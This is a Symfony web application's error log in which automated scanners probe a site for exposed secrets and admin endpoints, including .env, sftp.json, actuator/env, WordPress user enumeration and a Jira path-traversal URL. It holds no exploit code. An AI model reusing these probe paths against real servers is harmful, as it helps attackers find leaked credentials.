[2025-12-20 18:39:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:40:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:40:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:40:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:40:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:40:07] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-20 18:43:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=request","method":"GET"} []
[2025-12-20 18:43:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 18:43:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:43:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:43:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 18:44:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:44:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
